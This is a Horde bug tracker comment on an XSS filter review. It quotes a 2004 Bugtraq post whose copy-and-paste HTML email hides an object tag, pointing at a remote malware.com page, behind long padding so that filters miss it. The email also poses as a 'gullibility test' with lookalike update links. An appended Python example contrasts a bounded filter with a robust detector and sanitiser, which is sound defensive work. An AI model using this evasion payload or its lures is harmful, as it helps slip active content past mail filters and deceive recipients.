dev.horde.org
10/18/25
Comment on [#388] XSS filter review
> I haven't read this in depth yet, but might be worth another HTML MIME
> viewer review.
>
> > ----- Forwarded message from james.slora@phra.com -----
> > Date: Tue, 13 Jul 2004 15:30:08 -0400
> > From: "James C. Slora, Jr." <james.slora@phra.com>
> > Reply-To: "James C. Slora, Jr." <james.slora@phra.com>
> > Subject: Find the tag continued
> > To: bugtraq@securityfocus.com, Windows NTBugtraq Mailing List
> > <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
> >
> > Takeoff from http-equiv's notes about closing >
> >
> > By design, unprocessable HTML tags and tag parameters are ignored during
> > parsing. An amazing amount of worthless obfuscating stuff can be
> > inserted before the closing > of a valid tag, and the parameters for the
> > tag can be tough to find.
> >
> > Mail filtering and human review of unwanted stuff like object and iframe
> > tags might get fooled.
> >
> > Here is a funnier example of tag obfuscation, plus an odd interactive
> > rendering of the message. It uses http-equiv's Paul.html for its object
> > data source. Paste the stuff below into a text file named message.eml
> > and open it in Outlook Express. Forward it to Outlook for more of the
> > same fun. Add alternate text for non-html readers, and it could be even
> > more funny. Mix in some auto-execute silliness to taste. It will already
> > execute if forwarding while using Word as the email editor.
> >
> > ---> Copy everything below this line <---
> > Content-Type: text/html;
> >
> > As part of ongoing security efforts, Big Internet Software Company is
> > conducting a gullibility test. Forward this to all your friends to see
> > if they click the link. You will receive twenty dollars from them for
> > every friend you can fool.<br> <br>This message will now check for your
> > software's compatibility with this
> > test.<hemo><poisoning><spamsux><hidden><bury> <object << <img << <html
> > <<< </body </html
> >
> > Enlarge your nostrils - she will thank you for it. This is a dull
> > message designed to distract you from the tag completion down below if
> > you are a mail administrator who is looking at the source of a spam
> > message to see if there is anything fishy in it, or if you are a mail
> > screening program that wants to look for the closing of the object tag
> > but is only willing to look so far to avoid munching all the CPU time
> > that is available searching for closing tags.
> >
> >
> > You can ramble on and on and on yet still remain within the object tag
> > until you finally come to an > closing element. I wonder what the
> > limit might be?
> >
> > Object just goes and goes and goes. You could probably put an
> > encyclopedia in here.
> >
> > ******************************
> > Such ridiculous lengths made me wonder if eventually you must overflow a
> > buffer. But 48MB worth of garbage did not cause any problems - it just
> > took longer to display.
> > ******************************
> >
> > Insert additional garbage here ad nauseam.
> >
> >
> >
> > If you do not wish to receive similar messages in the future, please
> > send a blank message to
> > mailto:nostrilenlargement@stickyourfingerinit.com, or use this
> > unsubscribe link: data=3D"http://www.malware.com/paul.html"
> > <a HREF="www.widowsupdate.comm">
> >
> > <br><br>
> > *********SORRY***********
> > <br><br>
> >
> > Your mail client does not support the ActiveX control required to
> > participate in this test. You may still collect twenty dollars for each
> > of your friends that clicks.<br><br>
> >
> > If you do not wish to participate in future tests, <br>please send a
> > blank message to <br>mailto:nostrilenlargement@stickyourfingerinit.comm,
> > <br>or use this unsubscribe link:
> > "http://www.pickledherring.orgg/page.php"
> >
> > ----- End of forwarded message -----
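The quoted message targets filters that search for a tag's closing `>` only within a fixed window. As an added example (not part of the ticket and not Horde's filter code), the Python below contrasts such a bounded filter with one that flags a dangerous tag opener no matter how far away, or whether, its `>` appears, and shows how to strip the tag over the same span a lenient renderer would treat as the tag. The sample message is constructed to mirror the quoted one, with the hostnames replaced by example.invalid; the tag list and the 512-character window are assumptions for illustration.

```python
import re

# Constructed sample, modelled on the message quoted in the ticket. Hostnames
# are replaced with example.invalid; the filler is repeated so the object tag's
# closing '>' sits well over ten thousand characters past its opener.
FILLER = "This is a dull message designed to distract the mail administrator. "
SAMPLE = (
    "<html><body>This message will now check your software's compatibility."
    "<hemo><poisoning><spamsux><hidden><bury> <object << <img << <html <<< </body </html "
    + FILLER * 200
    + 'unsubscribe link: data="http://example.invalid/paul.html" '
    + '<a HREF="example.invalid">'
    + "<br><br>*********SORRY***********<br><br></body></html>"
)

# Tag names a mail filter would normally refuse in HTML bodies (assumed list).
DANGEROUS = ("object", "iframe", "embed", "applet", "script")
_OPENER = re.compile(r"<\s*(%s)\b" % "|".join(DANGEROUS), re.IGNORECASE)


def naive_filter_finds(html, window=512):
    """Bounded filter: a dangerous tag counts only if its '>' arrives within
    `window` characters. This is the 'only willing to look so far' behaviour
    the quoted message relies on; padding past the window hides the tag."""
    pat = re.compile(r"<\s*(%s)\b[^>]{0,%d}>" % ("|".join(DANGEROUS), window),
                     re.IGNORECASE)
    return [m.group(1).lower() for m in pat.finditer(html)]


def robust_filter_finds(html):
    """Flag every dangerous tag opener. A lenient renderer keeps consuming
    text as attributes until it meets a '>', so whether one appears within
    any fixed distance, or at all, does not change what will be rendered."""
    return [m.group(1).lower() for m in _OPENER.finditer(html)]


def opener_span(html, tag):
    """Characters from the first '<tag' opener to the '>' that closes it, or
    None if the tag never closes (a renderer then swallows the rest of the
    document into the tag)."""
    m = re.search(r"<\s*%s\b" % re.escape(tag), html, re.IGNORECASE)
    if not m:
        return None
    end = html.find(">", m.end())
    return None if end == -1 else end - m.start() + 1


def neutralize(html):
    """Remove each dangerous tag from its opener through its closing '>' (or
    to end of input when there is none), i.e. exactly the text a renderer
    would treat as the tag, so padding cannot move the attributes out of
    reach. Quoted attribute values are not parsed; a '>' inside quotes ends
    the span early."""
    out, pos = [], 0
    while True:
        m = _OPENER.search(html, pos)
        if not m:
            out.append(html[pos:])
            return "".join(out)
        out.append(html[pos:m.start()])
        end = html.find(">", m.end())
        if end == -1:
            return "".join(out)
        pos = end + 1


if __name__ == "__main__":
    print("naive filter sees :", naive_filter_finds(SAMPLE))
    print("robust filter sees:", robust_filter_finds(SAMPLE))
    print("object tag spans  :", opener_span(SAMPLE, "object"), "chars")
    print("after neutralize  :", neutralize(SAMPLE))
```

The bounded filter reports nothing on the sample while the opener-based one reports `object`; raising the window until it covers the padding makes the naive filter see the tag again, which is the point: the decision must not depend on a distance the sender controls. For a production filter the same rule should be applied by a real HTML tokenizer rather than a regex, so that quoted attribute values and comments are handled too.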